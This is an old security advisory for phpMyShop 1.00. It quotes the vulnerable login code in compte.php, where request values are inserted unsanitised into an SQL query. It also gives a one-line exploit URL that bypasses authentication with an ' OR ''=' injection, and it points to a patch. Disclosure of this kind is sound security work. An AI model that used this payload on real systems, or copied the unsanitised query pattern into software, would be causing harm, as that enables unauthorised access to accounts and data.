3rd Feb 2003 [SBWID-5963]
COMMAND
	phpMyShop SQL Injection
SYSTEMS AFFECTED
	phpMyShop 1.00
PROBLEM
	Frog Man [[email protected]] found :
	 PHP Code/Location :
	 °°°°°°°°°°°°°°°°°°?
	
	compte.php :
	---------------------------------------------------------------
	<?
	session_start();
	if (isset($achat))
	{
	session_register("achat");
	}
	else
	{
	header("location:index.php");
	}
	include("design/header.php");
	require("config.php");
	require("fonction.php");
	echo"<td bgcolor=\"$barre1\"><strong>Identification</strong></td>
	  </tr>
	  <tr>
	    <td><br>";
	if (isset($valider)) { $sql  =  "SELECT  id_cli,login_cli,pass_cli  FROM
	$table_client where login_cli='$identifiant' and  pass_cli='$password'";
	$sql =  mysql_db_query($base,$sql);  $test  =  mysql_num_rows($sql);  if
	($test=="0") { ?> <script  language="javascript">  alert("Identifiant
	ou    mot    de    passe    non    valide!");     </script>     <?
	echo"<center><strong>Identifiant   ou    mot    de    passe    non
	valide!</strong></center><br>";   }   else   {   $id_membre   =
	mysql_result($sql,0,"id_cli");     session_register("id_membre");     ?>
	<script  language="javascript">   document.location.href="valide.php"
	</script> <? } }
	[...] ---------------------------------------------------------------
	
	 Exploit :
	 °°°°°°°°?
	
	 http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
	
SOLUTION
	Check, http://www.pc-encheres.com
	-Also-
	A patch has been published on http://www.phpsecure.info .
	 More details :
	 °°°°°°°°°°°°°°
	
	http://www.frog-man.org/tutos/phpmyshop.txt